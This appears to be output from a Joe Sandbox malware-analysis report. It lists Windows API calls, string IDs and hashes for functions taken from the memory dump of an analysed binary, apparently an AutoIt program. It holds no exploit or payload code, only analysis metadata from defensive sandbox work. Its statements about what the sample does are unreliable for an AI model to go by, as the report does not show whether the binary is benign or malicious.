                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                  • Opcode ID: 8afe274e0e3efee2162380c24e21391976c805b142f14df7f47a790f49d97f68
                                                                                                                                  • Instruction ID: b820c591fdefef014d5184e2a9dba7ea5307024df9a69d343b520bf8db0e5ed3
                                                                                                                                  • Opcode Fuzzy Hash: 8afe274e0e3efee2162380c24e21391976c805b142f14df7f47a790f49d97f68
                                                                                                                                  • Instruction Fuzzy Hash: B731B132A0121D7EDB24EBA4EC49EEE77ACAF05364F10505AFB10F2090EB74DE45DA65
                                                                                                                                  Function 00F0F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00F0F14B
                                                                                                                                    • Part of subcall function 00F0D5EE: ClientToScreen.USER32(?,?), ref: 00F0D617
                                                                                                                                    • Part of subcall function 00F0D5EE: GetWindowRect.USER32(?,?), ref: 00F0D68D
                                                                                                                                    • Part of subcall function 00F0D5EE: PtInRect.USER32(?,?,00F0EB2C), ref: 00F0D69D
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0F1B4
                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F0F1BF
                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F0F1E2
                                                                                                                                  • _wcscat.LIBCMT ref: 00F0F212
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F0F229
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0F242
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0F259
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0F27B
                                                                                                                                  • DragFinish.SHELL32(?), ref: 00F0F282
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F0F36D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                                  • Opcode ID: 6898895ef2b762984a2e4f1e8fe1c824f73635df3582ee53c4aac9777244e440
                                                                                                                                  • Instruction ID: e6b74713115f26356981a7fcaaf9a5ef6a1020c81274e9e5cae0ee74b7778e77
                                                                                                                                  • Opcode Fuzzy Hash: 6898895ef2b762984a2e4f1e8fe1c824f73635df3582ee53c4aac9777244e440
                                                                                                                                  • Instruction Fuzzy Hash: 89615B72508304AFC710EF60DC85D9FBBE8BF89710F100A1DF695A61A1DB70AA09EB52
                                                                                                                                  Function 00EF219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EF21C0
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF21D5
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF21EC
                                                                                                                                    • Part of subcall function 00EE7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EE7621
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00EF221B
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF2226
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00EF2242
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2269
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2280
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF2292
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00F53A68), ref: 00EF22B0
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EF22BA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF22C7
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EF22D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                  • Opcode ID: da6b60435eb635b6b819527ef3ae1f9323f92fff0fa6f9672773b7047ceb629a
                                                                                                                                  • Instruction ID: 2ee839b2f8aabe54861498b1797c9fb9ed6d5a96d9da2f0da858aa8a38aa0a34
                                                                                                                                  • Opcode Fuzzy Hash: da6b60435eb635b6b819527ef3ae1f9323f92fff0fa6f9672773b7047ceb629a
                                                                                                                                  • Instruction Fuzzy Hash: ED31D43190121D6EEF24EFA4EC49EEE77ACAF05324F101159FB10B20A0DB75DE86DA64
                                                                                                                                  Function 00EA6BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove_memset
                                                                                                                                  • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                  • API String ID: 3555123492-286096704
                                                                                                                                  • Opcode ID: 2329352d89e44b102a20b71b2f4761ba895bf4a25f15be1f7fc129d9428106ba
                                                                                                                                  • Instruction ID: 526593adacd7efcffa773a90319d47750bb2db87e80fb5d34de7037e29937215
                                                                                                                                  • Opcode Fuzzy Hash: 2329352d89e44b102a20b71b2f4761ba895bf4a25f15be1f7fc129d9428106ba
                                                                                                                                  • Instruction Fuzzy Hash: 5C729E72D04219CBDF24CF98C9906EDB7B1FF4A324F2981A9D855BB241D734AE81EB50
                                                                                                                                  Function 00F0ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F0ED0C
                                                                                                                                  • GetFocus.USER32 ref: 00F0ED1C
                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00F0ED27
                                                                                                                                  • _memset.LIBCMT ref: 00F0EE52
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00F0EE7D
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00F0EE9D
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00F0EEB0
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F0EEE4
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00F0EF2C
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F0EF64
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F0EF99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                                  • Opcode ID: 229a489a2fb463018fc93f17ef9abd1f88acd1603eb624dfd492dd60ccd1fcfa
                                                                                                                                  • Instruction ID: 23458c1060a4f01952f9d9f43b04267ea8e489ddfcbed3f1a4a2f5e0f39abf14
                                                                                                                                  • Opcode Fuzzy Hash: 229a489a2fb463018fc93f17ef9abd1f88acd1603eb624dfd492dd60ccd1fcfa
                                                                                                                                  • Instruction Fuzzy Hash: ED818F71609306AFD720DF14C885A6BBBE8FF88364F04092DF99597291D770D905FBA2
                                                                                                                                  Function 00EDB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EDB903
                                                                                                                                    • Part of subcall function 00EDB8E7: GetLastError.KERNEL32(?,00EDB3CB,?,?,?), ref: 00EDB90D
                                                                                                                                    • Part of subcall function 00EDB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00EDB3CB,?,?,?), ref: 00EDB91C
                                                                                                                                    • Part of subcall function 00EDB8E7: RtlAllocateHeap.NTDLL(00000000,?,00EDB3CB), ref: 00EDB923
                                                                                                                                    • Part of subcall function 00EDB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EDB93A
                                                                                                                                    • Part of subcall function 00EDB982: GetProcessHeap.KERNEL32(00000008,00EDB3E1,00000000,00000000,?,00EDB3E1,?), ref: 00EDB98E
                                                                                                                                    • Part of subcall function 00EDB982: RtlAllocateHeap.NTDLL(00000000,?,00EDB3E1), ref: 00EDB995
                                                                                                                                    • Part of subcall function 00EDB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EDB3E1,?), ref: 00EDB9A6
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EDB3FC
                                                                                                                                  • _memset.LIBCMT ref: 00EDB411
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EDB430
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB441
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00EDB47E
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EDB49A
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00EDB4B7
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EDB4C6
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00EDB4CD
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EDB4EE
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00EDB4F5
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EDB526
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EDB54C
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EDB560
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                  • Opcode ID: eae91a8ae7356c863f0055de89925cb72d5863967ea0ba0c574639c4cedaef9f
                                                                                                                                  • Instruction ID: c556f4745c2121306f2103267e9a6446cb36a590a0f845733a4d10043ad64702
                                                                                                                                  • Opcode Fuzzy Hash: eae91a8ae7356c863f0055de89925cb72d5863967ea0ba0c574639c4cedaef9f
                                                                                                                                  • Instruction Fuzzy Hash: 14512A71900209EBDF14DFA4DC45AEEBBB9FF04304F14812AE915A62A1EB359A06DB60
                                                                                                                                  Function 00EE6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                    • Part of subcall function 00EE7C0C: GetFileAttributesW.KERNEL32(?,00EE6A7B), ref: 00EE7C0D
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6E7E
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EE6E99
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00EE6EAE
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EE6EDD
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6EEF
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6F01
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00EE6F0E
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE6F22
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00EE6F3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2643075503-1173974218
                                                                                                                                  • Opcode ID: 76a04b8496ae76dd626c600e18db721b0cd715d7e93d709b30d1a220bf468085
                                                                                                                                  • Instruction ID: 1bed102c6dfb3fd4420f375b9c655bedf6a963963bd646e6a763fb9e1d043289
                                                                                                                                  • Opcode Fuzzy Hash: 76a04b8496ae76dd626c600e18db721b0cd715d7e93d709b30d1a220bf468085
                                                                                                                                  • Instruction Fuzzy Hash: 0321D172408388AEC210EFA0D8849DFBBDC9B99354F044A5EF5D4D3052EA30D60D87A2
                                                                                                                                  Function 00EF7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                  • Opcode ID: 337a62711f1805d94c316b0355c6b4a1cf359fc0273f4c9a9bc5c973e6a58a30
                                                                                                                                  • Instruction ID: 9f46f44544e369c09381a9b6f4d3a6c38c844f2ad5fc33efdc6f13dad9e5c663
                                                                                                                                  • Opcode Fuzzy Hash: 337a62711f1805d94c316b0355c6b4a1cf359fc0273f4c9a9bc5c973e6a58a30
                                                                                                                                  • Instruction Fuzzy Hash: B321C731205118AFDB24AF64DC59B6E7BE8FF44710F008019FA49EB2A1DB70ED42EB91
                                                                                                                                  Function 00EF24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EF24F6
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EF2526
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF253A
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EF2555
                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EF25F3
                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EF2609
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                                  • Opcode ID: 2d035360a883cc93f61062c77e5de240b34fbbebb977886bb31ccafe2b228455
                                                                                                                                  • Instruction ID: 0047a76150bce475ebe2a9d32515f75cda37ac81460b4f86acf36eb28539bc35
                                                                                                                                  • Opcode Fuzzy Hash: 2d035360a883cc93f61062c77e5de240b34fbbebb977886bb31ccafe2b228455
                                                                                                                                  • Instruction Fuzzy Hash: 06418D7190021EAFCF14DFA4CC49AEEBBB4FF09314F20545AEA15B6191EB30AA44DF91
                                                                                                                                  Function 00EA8CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                  • API String ID: 0-1546025612
                                                                                                                                  • Opcode ID: 728c4786b6b8d13b7be75e956d1bba4dd769b9559811fbc0953317aba2a12967
                                                                                                                                  • Instruction ID: 6ed68a5a27a7f1530cee5615092b2a8a0a5621070e44fe47f2a16576a18703ec
                                                                                                                                  • Opcode Fuzzy Hash: 728c4786b6b8d13b7be75e956d1bba4dd769b9559811fbc0953317aba2a12967
                                                                                                                                  • Instruction Fuzzy Hash: C8929C75E0022ACBDF24CF58D8807EDB7B1BB59314F2491AAD819BB281D734AD81DF91
                                                                                                                                  Function 00EA8530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
